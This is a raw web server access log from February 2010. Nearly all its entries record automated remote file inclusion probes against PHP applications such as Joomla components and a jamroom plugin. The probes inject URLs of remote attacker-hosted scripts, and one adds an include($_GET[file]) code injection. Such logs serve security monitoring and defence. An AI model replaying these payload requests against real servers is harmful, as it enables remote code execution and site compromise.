60.251.165.181 - - [07/Feb/2010:06:17:05 -0800] "GET /logs/index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:17:05 -0800] "GET /index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:17:08 -0800] "GET /logs/access_100115.log%20%20/index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:17:37 -0800] "GET /logs/access_100107.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [07/Feb/2010:06:17:49 -0800] "GET /logs/access_100201.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:18:35 -0800] "GET /logs/access_100115.log%20%20/index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:18:36 -0800] "GET /logs/index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [07/Feb/2010:06:18:36 -0800] "GET /index.php?pageurl=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:18:52 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:18:52 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:18:52 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:04 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:04 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:04 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:05 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:05 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:05 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:08 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:08 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:08 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:19:10 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:19:11 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:19:11 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:21 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:21 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:21 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:21 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:24 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:24 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:24 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.99.97.167 - - [07/Feb/2010:06:19:29 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.pixero.net"
38.99.97.167 - - [07/Feb/2010:06:19:31 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.pixero.net"
218.38.136.125 - - [07/Feb/2010:06:19:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:32 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:32 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:32 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:32 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:19:38 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:19:38 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:19:38 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:39 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:39 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:39 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:45 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:45 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:19:45 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:19:56 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.49.99.12 - - [07/Feb/2010:06:19:58 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:20:18 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:20:18 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:20:18 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:06:20:37 -0800] "GET /logs/access_100103.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:20:37 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:09 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:09 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:16 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:16 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:16 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:29 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:06:21:35 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:24:19 -0800] "GET /logs/access_100106.log/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:24:27 -0800] "GET /logs/access_100107.log//admin/classes/TplLoad.php?full_path_to_public_program=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:24:40 -0800] "GET /logs/access_100109.log/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [07/Feb/2010:06:24:52 -0800] "GET /logs/access_100122.log//admin/classes/TplLoad.php?full_path_to_public_program=http://jok3rcrew.altervista.org/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:25:21 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:25:21 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:06:25:25 -0800] "GET /logs/access_100117.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [07/Feb/2010:06:25:27 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [07/Feb/2010:06:25:27 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [07/Feb/2010:06:25:27 -0800] "GET /logs/access_100110.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:25:44 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:25:44 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:25:44 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:25:53 -0800] "GET /logs/access_100106.log/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:26:33 -0800] "GET /logs/access_100109.log/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:06:26:36 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [07/Feb/2010:06:27:16 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:28:17 -0800] "GET /logs/access_100106.log/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:28:21 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:28:21 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:28:21 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:06:28:47 -0800] "GET /logs/access_100109.log/convert/mvcw.php?vwar_root=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:28:56 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:28:56 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:28:56 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:29:00 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:29:06 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:30:09 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:30:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:30:13 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:30:25 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:30:25 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:30:29 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:06:30:31 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:06:30:31 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:06:30:31 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:30:41 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:30:41 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:30:41 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:06:30:51 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.157 - - [07/Feb/2010:06:31:18 -0800] "GET /logs/access_100118.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://bipumnara.co.kr/start/data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:31:50 -0800] "GET /logs/access_100104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:01 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:01 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:07 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:26 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:32:30 -0800] "GET /logs/access_091231.log/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:32:30 -0800] "GET /logs/myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:06:32:30 -0800] "GET /myevent.php?myevent_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:30 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:06:32:36 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
